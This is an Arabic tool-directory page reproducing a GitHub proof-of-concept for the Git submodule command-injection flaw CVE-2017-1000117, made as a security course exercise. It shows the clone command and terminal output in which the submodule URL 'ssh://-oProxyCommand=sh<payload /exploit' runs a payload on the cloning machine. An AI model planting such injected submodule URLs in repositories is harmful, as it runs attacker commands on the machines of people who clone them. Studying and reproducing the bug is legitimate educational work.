Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2017-1000117 — CVE-2017-1000117 إعادة إنتاج الثغرة (PoC+Exp) | Kitploit
أدوات/GitHubGitHub/anonymking/cve-2017-1000117
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويبالتعلم والتعليممختبرات وتدريب عملي
GitHubanonymking/cve-2017-1000117

CVE-2017-1000117

CVE-2017-1000117 إعادة إنتاج الثغرة (PoC+Exp)

عرض المستودع
329منذ 7 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2017-1000117

ملخص المشروع

  • أحد مواضيع تصميم دورة أمن الشبكات
  • إعادة إنتاج ثغرة CVE-2017-1000117 (PoC+Exp)
  • Git + SSH

ملخص الثغرة:

  • اسم الثغرة: ثغرة حقن أوامر Git
  • رقم CNNVD: CNNVD-201708-670
  • مستوى الخطر: متوسط
  • رقم CVE: CVE-2017-1000117
  • نوع الثغرة: حقن أوامر
  • تاريخ النشر: 2017-08-16
  • نوع التهديد: عن بُعد
  • تاريخ التحديث: 2017-10-17
  • البائع: git-scm
  • مصدر الثغرة: TrevorJay
  • ملخص الثغرة: Git هو نظام تحكم بالإصدارات موزع مجاني ومفتوح المصدر طوره مطور البرمجيات الأمريكي لينوس تورفالدس (Linus Torvalds). توجد ثغرة أوامر في الإصدارات الأقدم من Git 2.7.5. يمكن للمهاجم عن بُعد استغلال عنوان URL مخصص مثل ssh://... لتشغيل برامج خرجت من الجهاز.

عملية الاستغلال

  • قم بتثبيت أداة Git ضمن نطاق الإصدارات المصابة (Git for Linux، Git for Windows)
  • اخترت الإصدار git-2.12.1 (تم اختباره ويعمل على كل من Linux وWindows) (روابط تنزيل الإصدار 2.12.1 لنظامي Linux وWindows هي: git-2.12.1.tar.gz و Git-2.12.1-64-bit.tar.bz2)
  • بعد تثبيت Git، قم باستنساخ المشروع مباشرةً مع الوحدات الفرعية: git clone --recursive https://github.com/AnonymKing/CVE-2017-1000117.git
$ git clone --recursive https://github.com/AnonymKing/CVE-2017-1000117.git
Cloning into 'CVE-2017-1000117'...
remote: Enumerating objects: 14, done.
remote: Counting objects: 100% (14/14), done.
remote: Compressing objects: 100% (13/13), done.
remote: Total 14 (delta 3), reused 8 (delta 0), pack-reused 0
Unpacking objects: 100% (14/14), done.
Submodule 'exploit' (ssh://-oProxyCommand=sh<payload /exploit) registered for path 'exploit'
Cloning into 'C:/Users/AnonymKing/Desktop/Git-2.12.1-64-bit/test/CVE-2017-1000117/exploit'...
Pseudo-terminal will not be allocated because stdin is not a terminal.


*********************************************
                   _ooOoo_
                  o8888888o
                  88" . "88
                  (| -_- |)
                  O\  =  /O
               ____/`---'\____
             .'  \\|     |//  `.
            /  \\|||  :  |||//  \
           /  _||||| -:- |||||-  \
           |   | \\\  -  /// |   |
           | \_|  ''\---/''  |   |
           \  .-\__  `-`  ___/-. /
         ___`. .'  /--.--\  `. . __
      ."" '&lt;  `.___\_&lt;|>_/___.'  >'"".
     | | :  `- \`.;`\ _ /`;.`/ - ` : | |
     \  \ `-.   \_ __\ /__ _/   .-` /  /
======`-.____`-.___\_____/___.-`____.-'======
                   `=---='
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

ssh_exchange_identification: Connection closed by remote host
fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists.
fatal: clone of 'ssh://-oProxyCommand=sh<payload /exploit' into submodule path 'C:/Users/AnonymKing/Desktop/Git-2.12.1-64-bit/test/CVE-2017-1000117/exploit' failed
Failed to clone 'exploit'. Retry scheduled
  • عندما ترى ظهور بوذا، تكون الثغرة قد أُعيد إنتاجها بنجاح، وتم تنفيذ الشيفرة الضارة في payload بنجاح.

تحديث 2019/06/21 10:30

  • أثناء كتابة التقرير، اكتشفت فجأة أن هذه الثغرة مشابهة جداً لثغرة CVE-2018-17456، فقط بصياغة مختلفة. السبب الجذري لكليهما هو عدم القدرة على تحليل الرمز "-" بشكل صحيح، مما يؤدي إلى تفسيره كمعامل ويسبب تنفيذ أوامر عشوائية.
  • لاستغلال ثغرة CVE-2018-17456، يمكنك الرجوع إلى هذه المقالة: تحليل ثغرة Git Submodule (CVE-2018-17456)

تحديث 2019/06/21 19:39

  • أثناء البحث عن مواد ذات صلة، وجدت ثغرة مشابهة أخرى وهي CVE-2018-11235.
  • بخصوص ثغرة CVE-2018-11235، إليك بعض المقالات المرجعية: CVE-2018-11235 git RCE، PoC exploit for CVE-2018-11235، تحليل مفصل لثغرة تنفيذ الأوامر عن بُعد في Git (CVE-2018-11235)
تنزيل الأداة